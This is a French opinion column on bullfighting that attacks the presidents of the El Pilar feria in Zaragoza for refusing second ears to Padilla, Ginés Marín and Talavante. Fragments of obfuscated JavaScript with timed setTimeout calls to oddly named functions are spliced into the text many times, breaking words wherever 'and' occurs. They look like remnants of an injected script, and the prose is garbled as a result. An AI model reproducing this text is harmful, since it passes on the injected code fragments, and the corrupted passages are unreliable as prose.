HORS DU PALCO

La feria de El Pilar qui vient de conclure, nous laisse, entre autres choses, un motif sérieux de réflexion et de préoccupation. Je n’ai jamais vu autant de toreros déçus, vis-à-vis de ce qu’ils considéraient légitimement comme un outrage à leurs mérites professionnels, ni autant d’injustice ni d’ineptie émanant d’un palco présidentiel comme celui de Saragosse.

Mesquin avec El Juli, ce furent des vols perfides à l’encontre de Juan José Padilla, Ginés Marín et Alejandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andro Talavante, qui furent les victimes de l’intolérable prestation du palco. Et chaque fois avec le même abus: refuser la seconde oreille de faenas bien conclues à l’épée –ce qui ne veut pas dire que ce furent des estocades parfaites-, qui avaient réussi à enthousiasmer les gradins et qui méritaient sans objections ce double trophée.

Je ne sais pas qui les a désignés et cela ne m’intéresse pas, mais les deux présidents impliqués dans les scandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andales et leurs respectifs assesseurs artistiques doivent abandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andonner leurs postes au palco présidentiel pour ne plus jamais y revenir. Ils sont indignes d’occuper cette charger et même d’être considérés comme de “bons aficionados”.

On ne sait pas si le mal dont souffrent ces messieurs est qu’ils se voient comme les “sauveurs” de la pureté et du prestige de la Corrida ou ce sont simplement des anti-taurins infiltrés, qui sont rentrés pour dinamiter avec leurs vues étriquées et leur ignorance –pour ne pas parler de leur mauvaise foi- tout ce qui puisse devenir un triomphe éclatant. Car avec leurs décisions arbitraires ils ont lésé les toreros: d’une part, avec cette réglementation si rigide et répandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andue dans les régions comme quoi il faut couper deux oreilles pour prétendre sortir par la Grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande Porte, et d’un autre côté les présidences refusent de l’attribuer sans aucune raison, à part celles provoquées par leur messianisme ou leur mauvaise digestion. Conclusion, la Grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande Porte ne s’ouvre pas alors que cela ferait tant de bien par les temps qui courent.

Je m’explique pour qu’il n’y ait pas de malentendu. Je ne milite pas sous le drapeau de ceux qui croient qu’il faut “aider” la tauromachie de n’importe quelle manière, en se laissant aller et en attribuant des trophées à tout va. Ils peuvent avoir de bonnes intentions, mais ceux qui pensent ainsi se tromphent et ne rendent pas service à la corrida. Je m’oppose fermement à cela et je m’incline même pour être encore plus exigeants. Mais quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and ces exigences sont largement satisfaites comme ce fut le cas avec Padilla et le toro imposant de Zalduendo, de Ginés Marín avec le novillo –qui ne méritait absolument pas le tour de piste dont le gratifia la présidence- de los Maños, et de Talvante avec le toro de Domingo Hernández, il faut fêter l’événement et se féliciter comme aficionados de pouvoir récompenser comme il se doit leurs oeuvres d’art, chacun avec son propre concept et sa sensibilité artistique. Il est difficile que se produise dans l’arène cette symbiose entre le toro, le torero, l’inspiration, l’adresse, et l’émotion; il en coûte pour atteindre les gradins, les enthousiamer pour qu’après quelqu’un installé à la tribune présidentielle sans que l’on sache pourquoi, défait tout ça avec un comportement arbitraire et incompétent. Des messieurs comme les deux présidents et leurs respectifs conseillers –je me refuse à donner leurs noms pour ne pas enfler leurs egos- ne devraient plus exercer comme présidents ni comme assesseurs et encore moins dans des arènes de première catégorie comme celles de Pignatelli. S’ils aiment vraiment la corrida qu’ils aillent sur les gradins ou restent à la maison et s’ils sont réellement cleptomanes qu’ils aillent consulter chez le psy, mais qu’on ne les laisse plus s’approcher du palco. Tous, hors du palco!

Les commentaires sont fermés.